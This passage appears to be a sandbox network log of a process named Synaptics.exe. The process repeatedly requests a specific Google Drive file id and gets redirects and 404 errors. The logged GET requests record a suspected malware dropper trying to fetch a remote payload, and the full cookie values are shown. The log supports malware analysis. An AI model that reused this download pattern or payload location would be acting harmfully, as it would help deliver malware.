                                                                                                                                Content-Length: 0
                                                                                                                                X-XSS-Protection: 0
                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Connection: close


                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                40 | 192.168.2.4 | 49873 | 142.250.181.14 | 443 | 4076 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                2024-12-24 17:20:59 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                Host: docs.google.com
                                                                                                                                Cache-Control: no-cache
                                                                                                                                2024-12-24 17:21:00 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                Content-Type: application/binary
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Tue, 24 Dec 2024 17:21:00 GMT
                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-BJABPBBjZmWglCiloDIaeg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Server: ESF
                                                                                                                                Content-Length: 0
                                                                                                                                X-XSS-Protection: 0
                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Connection: close


                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                41 | 192.168.2.4 | 49874 | 142.250.181.97 | 443 | 4076 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                2024-12-24 17:20:59 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Host: drive.usercontent.google.com
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Cookie: NID=520=p0E_LkS9oKugNUCdoqy_sMWPCqPd6Q85qp7og9By5GDrMGQOuF9xzFvLZ9eovIm-elwYsEwuSBKPIc3z1EmZmRuGVjdL0brECf8mXVgSmW5qfG7guvs2lhntCUOWqvShQF5bqn5R_b8f8UkTxYznayQsVmWaIv6qM0Vg0zptknET_-EbAP9NXbU
                                                                                                                                2024-12-24 17:21:00 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                                X-GUploader-UploadID: AFiumC6BkFi626pl81t_2QH3VOK9OZNC4R7lAWHNndeIJ2NWQbcFzoSSnZmuj0CGQTFLMZ27
                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Tue, 24 Dec 2024 17:21:00 GMT
                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-CKPjYxlYA21zmfc6vXULsQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Content-Length: 1652
                                                                                                                                Server: UploadServer
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Content-Security-Policy: sandbox allow-scripts
                                                                                                                                Connection: close
                                                                                                                                2024-12-24 17:21:00 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                2024-12-24 17:21:00 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="uiMfkTnCDhufnfYnE0kFbw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                2024-12-24 17:21:00 UTC | 115 | IN | Data Ascii: >That’s an error.</ins><p>The requested URL was not found on this server. <ins>That’s all we know.</ins></main>


                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                42 | 192.168.2.4 | 49876 | 142.250.181.14 | 443 | 4076 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                2024-12-24 17:20:59 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                Host: docs.google.com
                                                                                                                                Cache-Control: no-cache
                                                                                                                                2024-12-24 17:21:00 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                Content-Type: application/binary
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Tue, 24 Dec 2024 17:21:00 GMT
                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-RSSNMDRwgmvkEDDK2ks6hg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                Server: ESF
                                                                                                                                Content-Length: 0
                                                                                                                                X-XSS-Protection: 0
                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Connection: close


                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                43 | 192.168.2.4 | 49875 | 142.250.181.97 | 443 | 4076 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                2024-12-24 17:20:59 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Host: drive.usercontent.google.com
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Cookie: NID=520=p0E_LkS9oKugNUCdoqy_sMWPCqPd6Q85qp7og9By5GDrMGQOuF9xzFvLZ9eovIm-elwYsEwuSBKPIc3z1EmZmRuGVjdL0brECf8mXVgSmW5qfG7guvs2lhntCUOWqvShQF5bqn5R_b8f8UkTxYznayQsVmWaIv6qM0Vg0zptknET_-EbAP9NXbU
                                                                                                                                2024-12-24 17:21:00 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                                X-GUploader-UploadID: AFiumC7YzwNMq3rj4hf3wLmxz7m6FAHsvCig-bZMagAbBLaEGV1RwjwOkJEoSAzZMpKi5hVy
                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Tue, 24 Dec 2024 17:21:00 GMT
                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-uiHlfDNfzY20xe66xrKXGw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Content-Length: 1652
                                                                                                                                Server: UploadServer
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Content-Security-Policy: sandbox allow-scripts
                                                                                                                                Connection: close
                                                                                                                                2024-12-24 17:21:00 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                2024-12-24 17:21:00 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="ovq8vn_m_npslSqd859XBQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                2024-12-24 17:21:00 UTC | 115 | IN | Data Ascii: >That’s an error.</ins><p>The requested URL was not found on this server. <ins>That’s all we know.</ins></main>


                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                44 | 192.168.2.4 | 49889 | 142.250.181.14 | 443 | 4076 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                2024-12-24 17:21:02 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                Host: docs.google.com
                                                                                                                                Cache-Control: no-cache
                                                                                                                                2024-12-24 17:21:03 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                Content-Type: application/binary
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Tue, 24 Dec 2024 17:21:03 GMT
                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-MyO5P1CDwWMWttbdfAmVMA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Server: ESF
                                                                                                                                Content-Length: 0
                                                                                                                                X-XSS-Protection: 0
                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Connection: close


                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                45 | 192.168.2.4 | 49890 | 142.250.181.14 | 443 | 4076 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                2024-12-24 17:21:02 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                Host: docs.google.com
                                                                                                                                Cache-Control: no-cache
                                                                                                                                2024-12-24 17:21:03 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                Content-Type: application/binary
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Tue, 24 Dec 2024 17:21:03 GMT
                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-AVJ1QWZ7vvdDz1oq8VlIkg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Server: ESF
                                                                                                                                Content-Length: 0
                                                                                                                                X-XSS-Protection: 0
                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Connection: close


                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                46 | 192.168.2.4 | 49897 | 142.250.181.14 | 443 | 4076 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                2024-12-24 17:21:05 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                Host: docs.google.com
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Cookie: NID=520=qh-ukOUmpKIDdd1kgysVqyDq4zWsJ3HmMeD46WA0aLR-4CYLV_2_v68_hqe_miGaxKY1bijQI_MR8_5g85RzwpdTn5SeN-ED-kuHC-65e4kwQ3LCdHoRfa9--p6JzsbuU2Mu4UYOgCEH1x6aeybzksX3kbew952WrBqFseVauF_lXWFZTMTi7f7c
                                                                                                                                2024-12-24 17:21:06 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                Content-Type: application/binary
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Tue, 24 Dec 2024 17:21:06 GMT
                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-fHSmO0lGQUlVvnF7J70CXg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Server: ESF
                                                                                                                                Content-Length: 0
                                                                                                                                X-XSS-Protection: 0
                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Connection: close


                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                47 | 192.168.2.4 | 49900 | 142.250.181.14 | 443 | 4076 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                2024-12-24 17:21:05 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                Host: docs.google.com
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Cookie: NID=520=qh-ukOUmpKIDdd1kgysVqyDq4zWsJ3HmMeD46WA0aLR-4CYLV_2_v68_hqe_miGaxKY1bijQI_MR8_5g85RzwpdTn5SeN-ED-kuHC-65e4kwQ3LCdHoRfa9--p6JzsbuU2Mu4UYOgCEH1x6aeybzksX3kbew952WrBqFseVauF_lXWFZTMTi7f7c
                                                                                                                                2024-12-24 17:21:06 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                Content-Type: application/binary
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Tue, 24 Dec 2024 17:21:06 GMT
                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-ItCwldOg2AxbjJrqlkiAJA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Server: ESF
                                                                                                                                Content-Length: 0
                                                                                                                                X-XSS-Protection: 0
                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Connection: close


                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                48 | 192.168.2.4 | 49898 | 142.250.181.97 | 443 | 4076 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                2024-12-24 17:21:05 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Host: drive.usercontent.google.com
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Cookie: NID=520=p0E_LkS9oKugNUCdoqy_sMWPCqPd6Q85qp7og9By5GDrMGQOuF9xzFvLZ9eovIm-elwYsEwuSBKPIc3z1EmZmRuGVjdL0brECf8mXVgSmW5qfG7guvs2lhntCUOWqvShQF5bqn5R_b8f8UkTxYznayQsVmWaIv6qM0Vg0zptknET_-EbAP9NXbU
                                                                                                                                2024-12-24 17:21:06 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                                X-GUploader-UploadID: AFiumC4u73FbZ8X4yjtHkxSNyApsI2hanK3wXd3ARba7e9P77czY0wSQKgZTZU1pIRHkjZDC
                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Tue, 24 Dec 2024 17:21:06 GMT
                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-gK7g6gVI5DBWWKIEh2PX7g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Content-Length: 1652
                                                                                                                                Server: UploadServer
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Content-Security-Policy: sandbox allow-scripts
                                                                                                                                Connection: close
                                                                                                                                2024-12-24 17:21:06 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                2024-12-24 17:21:06 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="FVHbTkYvcRKJuArgaAZrmQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                2024-12-24 17:21:06 UTC | 115 | IN | Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                49 | 192.168.2.4 | 49899 | 142.250.181.97 | 443 | 4076 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                2024-12-24 17:21:05 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Host: drive.usercontent.google.com
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Cookie: NID=520=p0E_LkS9oKugNUCdoqy_sMWPCqPd6Q85qp7og9By5GDrMGQOuF9xzFvLZ9eovIm-elwYsEwuSBKPIc3z1EmZmRuGVjdL0brECf8mXVgSmW5qfG7guvs2lhntCUOWqvShQF5bqn5R_b8f8UkTxYznayQsVmWaIv6qM0Vg0zptknET_-EbAP9NXbU
                                                                                                                                2024-12-24 17:21:06 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                                X-GUploader-UploadID: AFiumC7bezbTf4YVUFig8YrGSvVMg-rK0mW1vmgQStP9ZrY1GOZcpiF6UXV4KCtg_NjvuF2a
                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Tue, 24 Dec 2024 17:21:06 GMT
                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-d0vr2e4qqysaCwp9X1Q4dA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Content-Length: 1652
                                                                                                                                Server: UploadServer
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Content-Security-Policy: sandbox allow-scripts
                                                                                                                                Connection: close
                                                                                                                                2024-12-24 17:21:06 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                2024-12-24 17:21:06 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="JZbI6I8XEMYOT2a14M7img">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                2024-12-24 17:21:06 UTC | 115 | IN | Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
50 | 192.168.2.4 | 49918 | 142.250.181.14 | 443 | 4076 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-24 17:21:08 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                User-Agent: Synaptics.exe
